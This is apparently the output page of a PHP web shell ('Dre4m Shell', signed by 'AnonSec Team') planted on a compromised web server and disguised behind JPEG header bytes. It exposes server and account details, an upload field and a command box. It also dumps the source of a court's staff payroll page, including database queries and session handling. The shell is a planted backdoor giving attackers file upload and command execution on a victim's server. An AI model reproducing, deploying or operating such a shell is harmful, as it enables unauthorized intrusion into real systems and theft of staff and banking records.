ÿØÿàJFIFÿáExifMM*ÿÛC  Dre4m Was Here
Dre4m Shell
Server IP : 199.250.214.225  /  Your IP : 3.23.102.31
Web Server : Apache
System : Linux vps64074.inmotionhosting.com 3.10.0-1160.105.1.vz7.214.3 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : nicngo5 ( 1001)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /home/nicngo5/consolidated/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/nicngo5//consolidated/staff_status.php
<?php
require_once('business logic/classes/users.php');
require_once('business logic/classes/operations.php');
require_once('business logic/classes/add_per.php');
//
$user = new User();

$per = new Per();
$oper = new Operations();
$banklist = $oper->getBank();
//
$uid = $_SESSION['uid'];
$access = $_SESSION['acc'];
if($access > 2)
   header("location:delay.php");


if (!$user->get_session())
{
   header("location:myown_mainpage.php?you are not login");
}
//
if (isset($_GET['q']) and $_GET['q'] == 'logout') 
{
    $user->user_logout();
    header("location:myown_mainpage.php? you are log out");
}
//
if (($_SERVER["REQUEST_METHOD"] == "POST") and ($_POST['submit'] == "Submit")) { 
    $msg = $per->addRecord($_POST );   
}

if (($_SERVER["REQUEST_METHOD"] == "POST") and ($_POST['update'] == "Update Staff Record")) {
    $msg = $per->staff_status($_POST );   }
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link rel="shortcut icon" href="images/favicon.ico">
<title>National Industrial Court of Nigeria...::...Personal Emoluments Record</title>
<link href="css/payroll.css" rel="stylesheet" type="text/css" />
<style type="text/css">
<!--
.style25 {	font-family: Verdana, Arial, Helvetica, sans-serif;
	color: #FF0000;
}
a:link {
	text-decoration: none;
}
a:visited {
	text-decoration: none;
}
a:hover {
	text-decoration: underline;
}
a:active {
	text-decoration: none;
}
.inputs {	background-color: #ffffff;
	margin: 2px;
	padding: 2px;
	border: 1px solid #FF8A00;
}
-->
</style>
<script language="javascript" type="text/javascript"> 
function submitregistration() {
 var form = document.login;
				
if( form.title.value == "Select Title")
{
alert( "Select valid Title" );
return false;
}     
 
else if(form.perid.value == "")
{
alert( "Enter Staff File Number" );
return false;
}
else if(form.surname.value == "")
{
alert( "Enter Surname" );
return false;
}
else if(form.first_name.value == "")
{
alert( "Enter First name" );
return false;
}
else if( form.designation.value == "")
{
alert( "Enter Designation" );
return false;
}
 else if( form.rank.value == "Select Rank")
{
alert( "Select valid Rank" );
return false;
}
else if( form.grade.value == "Staff Grade")
{
alert( "Select valid Grade" );
return false;
}
 else if( form.step.value == "Staff Step")
{
alert( "Select valid Step" );
return false;
}
else if( form.bank.value == "Select bank")
{
alert( "Select valid Bank Name" );
return false;
}
else if( form.bankGroup.value == "")
{
alert( "Enter Bank Group" );
return false;
}
else if( form.bank_branch.value == "")
{
alert( "Enter Bank Branch" );
return false;
}
else if( form.AccNo.value == "")
{
alert( "Enter Account Number" );
return false;
}
else if( form.section.value == "")
{
alert( "Enter Section" );
return false;
}
else if( form.employee_type.value == "Select type")
{
alert( "Select valid Employee" );
return false;
}
else if( form.gender.value == "Select Gender")
{
alert( "Select valid Gender" );
return false;
}
else if( form.section.value == "")
{
alert( "Enter Section" );
return false;
}
else if( form.home_address.value == "")
{
alert( "Enter Home Address" );
return false;
}
else if( form.division.value == "Select Division")
{
	alert( "Select Valid Division" );
	return false;
}
  // Select Gendergender...bankGroup...designation..bank_branch..Select Division...Select bank
}
function validateText(i) 
{
	if(i.value.length>0) 
		{
			i.value = i.value.replace(/[^\d,.]+/g,''); 
		}
}
function validateLength(i) 
{
	if(i.value.length > 2) 
		return (null);	
}
</script> 
<script language="javascript" src="js/cal2.js">
/*
Xin's Popup calendar script-  Xin Yang (http://www.yxscripts.com/)
Script featured on/available at http://www.dynamicdrive.com/
This notice must stay intact for use
*/
</script>
<script language="javascript" src="js/cal_conf2.js"></script>
<script type="text/javascript">
<!--

function MM_jumpMenu(targ,selObj,restore){ //v3.0
  eval(targ+".location='"+selObj.options[selObj.selectedIndex].value+"'");
  if (restore) selObj.selectedIndex=0;
  
}
function toggleStep(value)
{
	if(value == "CR")
	document.getElementById('tr_step').style.display = "table-row";
	else
	document.getElementById('tr_step').style.display = "none";
}
//-->
</script>
</head>
<body onLoad="chan()";  update_all()">
<table width="744" border="0" cellpadding="0" cellspacing="0" class="container" align="center" >
  <!--DWLayoutTable-->
  <tr>
    <td width="800" height="42" colspan="2" valign="top"><?php require_once('header.php');?></td>
  </tr>
  <tr>
    <td height="19" colspan="2" valign="top"><table width="100%" border="0" cellpadding="0" cellspacing="0" class="bottomborder">
      <!--DWLayoutTable-->
      <tr>
        <td width="26%">&nbsp;<a href="userArea.php">Home</a></td>
        <td width="74%"><?php   $user->get_fullname($uid); ?>  <a href="?q=logout">Logout</a>&nbsp;</td>
      </tr>
    </table></td>
  </tr>
  <tr>
    <td height="243" valign="top"><br />
      <?php require('links.php');?>
<br /></td>
    <td valign="top"><table width="587" border="0" align="left" cellpadding="0" cellspacing="0">
      <tr>
        <td width="491" colspan="3"><br /><fieldset>
          <legend>Setup Personal Emolument Record<br />
            </legend>
          <form id="login" name="login" method="post" action="" enctype="multipart/form-data">
            <table width="543" border="0" align="left">
              <tr>
                <td colspan="2"><?php if(isset($msg))
			echo '<div class="style28" align="center">'.$msg.'</div>';
			//}
			?></td>
              </tr>
              <tr>
                <td width="235"><div align="right">Select Staff</div></td>
                <td width="281"><select name="jumpMenu" id="jumpMenu" onchange="MM_jumpMenu('parent',this,0)">
          <option selected="selected">Select Name:</option>
          <?php
		  	$division =  $_SESSION['division'];
			mysql_select_db($database_conn, $conn);
			$result = mysql_query("select * from tblper where employee_type = 'CONSOLIDATED'  order by surname, othernames");
			while($rows = mysql_fetch_assoc($result))
			{
				if(isset($_GET['p']) && ($rows['fileNo']==$_GET['p']))
				{	
					$update_value = strtoupper($rows['fileNo']);
					$title = strtoupper($rows['title']);
					$sname = strtoupper($rows['surname']);
					$fname = strtoupper($rows['first_name']);
					$oname  = strtoupper($rows['othernames']);					
				}							
				echo "<option value='staff_status.php?p=".$rows['fileNo']."'>".$rows['surname'].' '.$rows['first_name'].' '.$rows['othernames']."</option>";
			}
		?>
                                                     </select>                </td>
              </tr>
              <tr>
                <td><div align="right">File Number:</div></td>
                <td><input type="text" name="fileno" readonly="readonly" id="fileno" value="<?php echo $update_value; ?>" /></td>
              </tr>
              <tr>
                <td><div align="right">Name:</div></td>
                <td><strong><?php echo $title." ".$sname." ".$fname." ".$oname; ?></strong></td>
              </tr>
              <tr>
                <td>&nbsp;</td>
                <td>&nbsp;</td>
              </tr>
              <tr>
                <td><div align="right">Operation Type:</div></td>
                <td><input type="radio" name="type1" id="radio" onchange="pick(this.value)" value="1" checked="CHECKED" />Staff Status
                  <!--<input type="radio" name="type1" id="radio2" value="2" onchange="pick(this.value)"  /> Transfer</td>-->
              </tr>
              <tr id="tr1">
                <td><div align="right">Employee Status</div></td>
                <td><label for="status"></label>
                  <select name="status" id="status">
                    <option  value="" selected="selected">Select Status</option>
                    <option value="Active Service">Active Service</option>
                    <option value="Contract Service">Contract Service</option>
                    <option value="Dismissal">Dismissal</option>
                    <option value="Maternity Leave">Maternity Leave</option>
                    <option value="Study Leave">Study Leave</option>
                    <option value="Resignation">Resignation</option>
                    <option value="Retirement">Retirement</option>
                    <option value="Temporary Suspension">Temporary Suspension</option>
                    <option value="Deceased">Deceased</option>
                  </select></td>
              </tr>
              <tr id="tr2" style="display:none">
                <td><div align="right">Division</div></td>
                <td><select name="division" id="division">
                  <option value="" value="selected">Select Division</option>
                  <?php
                $result = mysql_query("select * from tbldivision order by division");
						while($rows = mysql_fetch_assoc($result))
						{
							echo "<option value=".$rows['division'].">".$rows['division']."</option>";
						}
				?>
                </select></td>
                </tr>
              
              <tr>
                <td>&nbsp;</td>
                <td><input type="submit" name="update" id="update" value="Update Staff Record" onclick=" return submitForm()" /></td>
              </tr>
            </table>
          </form>
        </fieldset></td>
      </tr>
    </table></td>
  </tr>
  <tr>
    <td height="20" colspan="2" valign="top"><table width="100%" border="0" cellpadding="0" cellspacing="0">
      <!--DWLayoutTable-->
      <tr>
        <td align="right">
		</td>
      </tr>
    </table></td>
  </tr>
</table>
<div class="clear"></div>
</body>
</html>
<?php $user->close();?>

Anon7 - 2022
AnonSec Team